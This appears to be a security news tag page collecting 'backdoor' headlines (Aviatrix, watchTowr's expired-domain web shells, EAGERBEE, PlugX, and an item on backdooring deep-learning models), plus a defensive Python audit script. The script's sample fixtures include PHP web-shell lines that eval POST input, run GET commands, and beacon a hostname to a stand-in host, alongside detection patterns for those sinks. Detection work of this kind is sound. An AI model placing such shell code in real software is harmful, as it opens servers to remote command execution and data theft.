Tag: backdoor
-
How organizations can secure their AI code
Tags: ai, application-security, awareness, backdoor, breach, business, chatgpt, ciso, compliance, control, credentials, crime, cybersecurity, data, data-breach, finance, github, healthcare, LLM, malicious, ml, open-source, organized, programming, risk, risk-management, software, startup, strategy, supply-chain, technology, tool, training, vulnerability
In 2023, the team at data extraction startup Reworkd was under tight deadlines. Investors pressured them to monetize the platform, and they needed to migrate everything from Next.js to Python/FastAPI. To speed things up, the team decided to turn to ChatGPT to do some of the work. The AI-generated code appeared to function, so they…
-
US hits back against China’s Salt Typhoon group
Tags: attack, backdoor, china, cisa, ciso, communications, computer, control, crypto, cve, cyber, cyberattack, cybersecurity, defense, detection, disinformation, espionage, exploit, finance, government, group, infosec, infrastructure, intelligence, ivanti, law, malicious, mandiant, microsoft, network, north-korea, office, tactics, technology, theft, threat, tool, vpn, vulnerability
The US is hitting back against the threat group, dubbed Salt Typhoon by Microsoft, which is allegedly behind recent cyber attacks against American telecommunications providers, as part of a wider campaign against Chinese-based hacking. On Friday the Department of the Treasury’s Office of Foreign Assets Control (OFAC) said it is sanctioning Sichuan Juxinhe Network Technology, a…
-
Hackers Use CVE-2024-50603 to Deploy Backdoor on Aviatrix Controllers
A critical vulnerability (CVE-2024-50603) in the Aviatrix Controller allows unauthenticated RCE. Active exploitation observed by Wiz Research in… First seen on hackread.com Jump to article: hackread.com/hackers-cve-2024-50603-aviatrix-controllers-backdoor/
-
Cryptojacking, backdoors abound as fiends abuse Aviatrix Controller bug
Tags: backdoor
This is what happens when you publish PoCs immediately, hm? First seen on theregister.com Jump to article: www.theregister.com/2025/01/13/severe_aviatrix_controller_vulnerability/
-
Hackers exploit critical Aviatrix Controller RCE flaw in attacks
Threat actors are exploiting a critical remote command execution vulnerability, tracked as CVE-2024-50603, in Aviatrix Controller instances to install backdoors and crypto miners. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/hackers-exploit-critical-aviatrix-controller-rce-flaw-in-attacks/
-
Hackers Exploit Aviatrix Controller Vulnerability to Deploy Backdoors and Crypto Miners
A recently disclosed critical security flaw impacting the Aviatrix Controller cloud networking platform has come under active exploitation in the wild to deploy backdoors and cryptocurrency miners. Cloud security firm Wiz said it’s currently responding to “multiple incidents” involving the weaponization of CVE-2024-50603 (CVSS score: 10.0), a maximum severity bug that could result in First seen…
-
Expired Domains Allowed Control Over 4,000 Backdoors on Compromised Systems
No less than 4,000 unique web backdoors previously deployed by various threat actors have been hijacked by taking control of abandoned and expired infrastructure for as little as $20 per domain. Cybersecurity company watchTowr Labs said it pulled off the operation by registering over 40 domain names that the backdoors had been designed to use for…
-
RedDelta Leverages PlugX Backdoor in State-Sponsored Espionage Campaigns
A recent report by Insikt Group reveals an ongoing, sophisticated cyber-espionage operation by the RedDelta advanced persistent threat First seen on securityonline.info Jump to article: securityonline.info/reddelta-leverages-plugx-backdoor-in-state-sponsored-espionage-campaigns/
-
RedDelta Deploys PlugX Malware to Target Mongolia and Taiwan in Espionage Campaigns
Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia have been targeted by the China-nexus RedDelta threat actor to deliver a customized version of the PlugX backdoor between July 2023 and December 2024. ”The group used lure documents themed around the 2024 Taiwanese presidential candidate Terry Gou, the Vietnamese National Holiday, flood protection in Mongolia, and meeting invitations, including…
-
Ivanti zero-day exploited by APT group that previously targeted Connect Secure appliances
Researchers from Google’s Mandiant division believe the critical remote code execution vulnerability patched on Wednesday by software vendor Ivanti has been exploited since mid-December by a Chinese cyberespionage group. This is the same group that has exploited zero-day vulnerabilities in Ivanti Connect Secure appliances back in January 2024 and throughout the year. The latest attacks, exploiting…
-
Thousands of deserted backdoors disrupted
Tags: backdoor
First seen on scworld.com Jump to article: www.scworld.com/brief/thousands-of-deserted-backdoors-disrupted
-
Thousands of Live Hacker Backdoors Found in Expired Domains
SUMMARY Cybersecurity researchers at watchTowr have identified over 4,000 live hacker backdoors, exploiting abandoned infrastructure and expired domains…. First seen on hackread.com Jump to article: hackread.com/live-hacker-backdoors-found-in-expired-domains/
-
Malicious hackers have their own shadow IT problem
Researchers at watchTowr Labs found that abandoned and expired internet infrastructure left by hacking groups can function as backdoors within other backdoors. First seen on cyberscoop.com Jump to article: cyberscoop.com/malicious-hackers-have-their-own-shadow-it-problem/
-
Abandoned Backdoors: How Malicious Infrastructure Lives On
Studying Backdoors in Web Shells, Researchers Find 4,000 Infected Systems
How many servers are infected by web shells designed to give attackers remote access, but that now phone home to malicious infrastructure that has since been abandoned or has expired? Security researchers who posed that question have counted 4,000 such systems, including in government and education. First…
-
Over 4,000 backdoors hijacked by registering expired domains
Over 4,000 abandoned but still active web backdoors were hijacked and their communication infrastructure sinkholed after researchers registered expired domains used for commanding them. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/over-4-000-backdoors-hijacked-by-registering-expired-domains/
-
Crims backdoored the backdoors they supplied to other miscreants. Then the domains lapsed
Tags: backdoor
Here’s what $20 gets you these days First seen on theregister.com Jump to article: www.theregister.com/2025/01/08/backdoored_backdoors/
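Added example for the watchTowr items above (this is not watchTowr's tooling or code from any of the linked articles): a small Python audit a defender can run over a web root to inventory suspected PHP web shells, pull out the hard-coded callback hosts they phone home to, and flag the ones that no longer resolve, which is exactly the condition that let the researchers register lapsed domains and inherit control of the implants. The sample files, their paths and the `.test` hostnames are constructed for this example; the DNS check uses only the standard library, and the resolver is injectable so the audit can run offline.

```python
import re
import socket
from typing import Callable, Dict, List

# Constructed sample files (illustrative strings written for this example,
# not real web shell samples). Two are PHP-style web shells that phone home
# to a hard-coded callback host; the third is benign.
SAMPLE_FILES: Dict[str, str] = {
    "/var/www/html/uploads/img.php": (
        "<?php @eval(base64_decode($_POST['c']));"
        " @file_get_contents('http://beacon.example-abandoned.test/ping?h=' . gethostname()); ?>"
    ),
    "/var/www/html/wp-content/cache.php": (
        "<?php $ch = curl_init('https://updates.example-live.test/check'); curl_exec($ch);"
        " if (isset($_GET['x'])) { system($_GET['x']); } ?>"
    ),
    "/var/www/html/index.php": "<?php echo 'hello'; ?>",
}

# Hostname of any http(s) URL literal embedded in the source.
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)", re.IGNORECASE)
# Crude web shell heuristic: a code-execution sink plus request-controlled input.
# The \b keeps library calls such as curl_exec( from matching the exec( sink.
EXEC_SINK_RE = re.compile(r"\b(?:eval|system|passthru|shell_exec|exec)\s*\(", re.IGNORECASE)
REQUEST_INPUT_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")


def looks_like_web_shell(source: str) -> bool:
    """True when the file both reads request input and reaches an execution sink."""
    return bool(EXEC_SINK_RE.search(source)) and bool(REQUEST_INPUT_RE.search(source))


def extract_callback_hosts(source: str) -> List[str]:
    """Hostnames the file would contact, de-duplicated, lower-cased and sorted."""
    return sorted({m.group(1).lower() for m in URL_HOST_RE.finditer(source)})


def host_resolves(host: str) -> bool:
    """Live DNS check; a callback host that no longer resolves is a takeover candidate."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False


def audit_web_shells(
    files: Dict[str, str],
    resolver: Callable[[str], bool] = host_resolves,
) -> List[dict]:
    """Report every callback host found in a suspected shell and whether it still resolves."""
    findings = []
    for path, source in files.items():
        if not looks_like_web_shell(source):
            continue
        for host in extract_callback_hosts(source):
            findings.append({
                "path": path,
                "host": host,
                "status": "resolving" if resolver(host) else "orphaned",
            })
    return findings


if __name__ == "__main__":
    # With the real resolver both constructed hosts report as orphaned:
    # .test is a reserved TLD and never resolves.
    for finding in audit_web_shells(SAMPLE_FILES):
        print(f"{finding['status']:10} {finding['host']:32} {finding['path']}")
```

An "orphaned" result is a lead, not a verdict: confirm registration status through WHOIS/RDAP before concluding the domain has lapsed, and treat the shell as live either way. As the watchTowr work shows, whoever registers the lapsed domain inherits the implant, so removing the shell matters more than the current state of its callback domain.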
-
Middle East subjected to Eagerbee backdoor attacks
First seen on scworld.com Jump to article: www.scworld.com/brief/middle-east-subjected-to-eagerbee-backdoor-attacks
-
EAGERBEE Malware Updated Its Arsenal With Payloads and Command Shells
Kaspersky researchers’ investigation into the EAGERBEE backdoor, deployed against Middle Eastern ISPs and government entities, revealed novel components, including a service injector that injects the backdoor into running services. Post-installation, EAGERBEE deploys plugins with diverse functionalities, as follows: How Does the Attack Work? The attackers initially compromised the system through an unknown vector.…
-
New EAGERBEE Variant Targets ISPs and Governments with Advanced Backdoor Capabilities
Internet service providers (ISPs) and governmental entities in the Middle East have been targeted using an updated variant of the EAGERBEE malware framework. The new variant of EAGERBEE (aka Thumtais) comes fitted with various components that allow the backdoor to deploy additional payloads, enumerate file systems, and execute command shells, demonstrating a significant evolution. ”The key First…
-
Eagerbee backdoor targets govt entities and ISPs in the Middle East
Experts spotted new variants of the Eagerbee backdoor being used in attacks on government organizations and ISPs in the Middle East. Kaspersky researchers reported that the new variants are being used against Internet Service Providers (ISPs) and government entities in the region. Kaspersky’s analysis revealed new attack components, including…
-
EAGERBEE: Advanced Backdoor Targets Middle Eastern ISPs and Government Entities
Kaspersky Labs has uncovered a sophisticated cyberespionage campaign deploying the EAGERBEE backdoor to infiltrate internet service providers (ISPs) First seen on securityonline.info Jump to article: securityonline.info/eagerbee-advanced-backdoor-targets-middle-eastern-isps-and-government-entities/
-
EagerBee Backdoor Takes Flight Against Mideast ISPs, Government Targets
The malware, operated by China-backed cyberattackers, has been significantly fortified with new evasive and post-infection capabilities. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/eagerbee-backdoor-middle-east-isps-government-targets
-
Eagerbee backdoor deployed against Middle Eastern govt orgs, ISPs
New variants of the Eagerbee malware framework are being deployed against government organizations and internet service providers (ISPs) in the Middle East. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/eagerbee-backdoor-deployed-against-middle-eastern-govt-orgs-isps/
-
Stealthy Steganography Backdoor Attacks Target Android Apps
BARWM is a novel backdoor attack approach for real-world deep learning (DL) models deployed on mobile devices. Existing backdoor attacks often suffer from limitations such as altering the model structure or relying on easily detectable, sample-agnostic triggers. By using DNN-based steganography to generate sample-specific backdoor triggers that are imperceptible, BARWM is able to circumvent these limitations.…
-
PLAYFULGHOST backdoor supports multiple information stealing features
PLAYFULGHOST is a new malware family with capabilities including keylogging, screen and audio capture, remote shell access, and file transfer/execution. Google researchers who analyzed the family found that the PLAYFULGHOST backdoor shares functionality with Gh0st RAT, whose source code was publicly released in…